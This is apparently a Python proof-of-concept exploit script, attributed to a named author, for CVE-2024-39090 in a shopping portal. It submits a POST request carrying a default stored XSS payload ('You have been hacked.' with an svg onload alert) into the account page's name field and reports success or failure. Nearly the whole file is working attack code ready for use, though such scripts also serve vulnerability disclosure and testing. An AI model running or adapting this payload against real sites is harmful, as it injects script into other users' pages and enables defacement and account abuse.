#!/usr/bin/env python3

#===========================================================
#        CSRF to Stored XSS Exploit Script (CVE-2024-39090)
#
#Written by: Arvin Rafael Legaspi
#Date: October 5, 2024
#===========================================================

import requests
import argparse

def ascii():
    print(r""""   ___ ___ ___ ___   _         ___ _                  _  __  _____ ___ 
  / __/ __| _ \ __| | |_ ___  / __| |_ ___ _ _ ___ __| | \ \/ / __/ __|
 | (__\__ \   / _|  |  _/ _ \ \__ \  _/ _ \ '_/ -_) _` |  >  <\__ \__ \
  \___|___/_|_\_|    \__\___/ |___/\__\___/_| \___\__,_| /_/\_\___/___/
                                                                       """)

# Setting up command-line argument parsing
def main():
    ascii()
    parser = argparse.ArgumentParser(description="Exploit CSRF to Stored XSS in PHPGurukul Shopping Portal.")
    
    # Set the arguments are required
    parser.add_argument('-u','--url', required=True, help="Target URL for the vulnerable endpoint (e.g., http://localhost/shopping/my-account.php)")
    parser.add_argument('-p','--payload', type=str, default="XSS&quot;&gt;You have been hacked.&lt;svg/onload=alert(1)&gt;&lt;", help="Malicious XSS payload to inject (e.g., XSS&quot;&gt;You have been hacked.&lt;svg/onload=alert(1)&gt;&lt;)")
    parser.add_argument('-c', '--contactno', type=str, default='1234567890', help="Contact number (optional, default is 1234567890)")
    
    # Parsing arguments
    args = parser.parse_args()

    # Execute the exploit function with the given arguments
    exploit_csrf_to_xss(args.url, args.payload, args.contactno)
    
def exploit_csrf_to_xss(target_url, payload, contactno):
    # Setup a POST request to the target URL
    data = {
        "name": payload,  # Malicious payload passed as an argument
        "contactno": contactno,  # Contact number passed as an argument
        "update": ""  # Empty value for the update parameter
    }
    
    try:
        # Send the POST request
        response = requests.post(target_url, data=data)
        
        # Output the response from the server
        print("Response:\n")
        
        print("=====================================================================")
        # Check if the request was successful
        if response.status_code == 200:
            print("\nPayload successfully submitted!")
        else:
            print(f"\nFailed to submit the payload. Status code: {response.status_code}")
        print("\n=====================================================================")
    except requests.exceptions.RequestException as e:
        # Print any error if it occurs during the request
        print(f"Error: {e}")
    
if __name__ == '__main__':
    main()